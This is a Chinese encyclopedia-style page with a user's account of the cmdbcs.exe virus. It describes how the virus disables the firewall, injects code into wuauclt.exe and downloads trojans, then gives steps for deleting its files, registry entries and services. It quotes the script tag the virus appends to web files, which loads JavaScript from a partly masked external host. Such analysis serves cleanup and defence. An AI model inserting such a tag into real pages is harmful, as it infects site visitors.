“cmdbcs.exe”的意思、由来-中文百科全书

最近电脑突然卡，发现进程了多了很多个cmdbcs.exe

感觉不对，马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀

果然，瑞星报毒！！！

1.病毒运行后，释放如下副本以及文件：

%systemroot%\\system32\\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\\system32\\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去

5.感染全盘的php jsp asp htm html文件在后面写入<script language=javascript src=http://cc.18d***.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作

读取http://*.com/elf_listo.txt的文件列表

下载27个木马和病毒到c:\\Program Files下面分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe

清除办法：

下载sreng：http://www.antidu.cn/board/helpst/

1.删除：

%systemroot%\\system32\\drivers\\msconkt.sys

%systemroot%\\system32\\AVPSrv.dll

%systemroot%\\system32\\cmdbcs.dll

%systemroot%\\system32\\DbgHlp32.dll

%systemroot%\\system32\\Kvsc3.dll

%systemroot%\\system32\\LYLOADER.EXE

%systemroot%\\system32\\LYMANGR.DLL

%systemroot%\\system32\\MSDEG32.DLL

%systemroot%\\system32\VDispDrv.dll

%systemroot%\\system32\\REGKEY.hiv

%systemroot%\\system32\\SSLDyn.dll

%systemroot%\\system32\\wxptdi.sys

%systemroot%\\608769L.exe

%systemroot%\\608769M.exe

%systemroot%\\608769MM.DLL

%systemroot%\\608769WL.DLL

%systemroot%\\AVPSrv.exE

%systemroot%\\cmdbcs.exe

%systemroot%\\DbgHlp32.exe

%systemroot%\\Kvsc3.exE

%systemroot%\VDispDRV.EXE

%systemroot%\\SSLDyn.exE

%systemroot%\\system32\\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推）

2.重启之后

打开sreng

启动项目注册表删除如下项目

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<SSLDyn><%systemroot%\\SSLDyn.exE> []

<cmdbcs><%systemroot%\\cmdbcs.exe> []

<WinSysM><%systemroot%\\608769M.exe> []

<WinSysW><%systemroot%\\608769L.exe> []

<Kvsc3><%systemroot%\\Kvsc3.exE> []

<AVPSrv><%systemroot%\\AVPSrv.exE> []

<NVDispDrv><%systemroot%\\aorwpw.exe> [N/A]

<DbgHlp32><%systemroot%\\DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]

<system32\\DRIVERS\\msconkt.sys><N/A>（之前的comint32.sys变种）

[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]

<system32\\DRIVERS\\msconkt.sys><N/A>

[PciHardDisk / PciHardDisk][Stopped/Manual Start]

<\\??\\%systemroot%\\system32\\fat32.sys><N/A>（机器狗病毒变种）

3.清除机器狗病毒

参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html

解决方法第三点即可

4.清除GD*I32.dll，bj*rl.dll，addr*help.dll木马群

参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可

词条	cmdbcs.exe
释义	最近电脑突然卡，发现进程了多了很多个cmdbcs.exe 感觉不对，马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀果然，瑞星报毒！！！ 1.病毒运行后，释放如下副本以及文件： %systemroot%\\system32\\wxptdi.sys 2.释放一个批处理停止Windows 防火墙服务 3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年 4.启动一个空壳的wuauclt.exe 把%systemroot%\\system32\\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去 5.感染全盘的php jsp asp htm html文件在后面写入<script language=javascript src=http://cc.18d**.net/1.js></script>的代码 6.wuauclt.exe执行下载木马的操作读取http://.com/elf_listo.txt的文件列表下载27个木马和病毒到c:\\Program Files下面分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe 清除办法：下载sreng：http://www.antidu.cn/board/helpst/ 1.删除： %systemroot%\\system32\\drivers\\msconkt.sys %systemroot%\\system32\\AVPSrv.dll %systemroot%\\system32\\cmdbcs.dll %systemroot%\\system32\\DbgHlp32.dll %systemroot%\\system32\\Kvsc3.dll %systemroot%\\system32\\LYLOADER.EXE %systemroot%\\system32\\LYMANGR.DLL %systemroot%\\system32\\MSDEG32.DLL %systemroot%\\system32\VDispDrv.dll %systemroot%\\system32\\REGKEY.hiv %systemroot%\\system32\\SSLDyn.dll %systemroot%\\system32\\wxptdi.sys %systemroot%\\608769L.exe %systemroot%\\608769M.exe %systemroot%\\608769MM.DLL %systemroot%\\608769WL.DLL %systemroot%\\AVPSrv.exE %systemroot%\\cmdbcs.exe %systemroot%\\DbgHlp32.exe %systemroot%\\Kvsc3.exE %systemroot%\VDispDRV.EXE %systemroot%\\SSLDyn.exE %systemroot%\\system32\\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推） 2.重启之后打开sreng 启动项目注册表删除如下项目 [HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <SSLDyn><%systemroot%\\SSLDyn.exE> [] <cmdbcs><%systemroot%\\cmdbcs.exe> [] <WinSysM><%systemroot%\\608769M.exe> [] <WinSysW><%systemroot%\\608769L.exe> [] <Kvsc3><%systemroot%\\Kvsc3.exE> [] <AVPSrv><%systemroot%\\AVPSrv.exE> [] <NVDispDrv><%systemroot%\\aorwpw.exe> [N/A] <DbgHlp32><%systemroot%\\DbgHlp32.exe> [] 在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”： [RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start] <system32\\DRIVERS\\msconkt.sys><N/A>（之前的comint32.sys变种） [RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start] <system32\\DRIVERS\\msconkt.sys><N/A> [PciHardDisk / PciHardDisk][Stopped/Manual Start] <\\??\\%systemroot%\\system32\\fat32.sys><N/A>（机器狗病毒变种） 3.清除机器狗病毒参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html 解决方法第三点即可 4.清除GDI32.dll，bjrl.dll，addr*help.dll木马群参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可
随便看	宋李嵩市担婴戏图宋李嵩水殿招凉图宋李嵩月夜看潮图宋礼宋礼成宋礼夫宋礼华宋莉萍宋丽宋丽川宋丽华宋丽佳宋丽娟宋丽丽宋丽梅宋丽萍宋丽英宋丽颖宋厉公宋励华宋利明宋利强宋利学宋翃宋立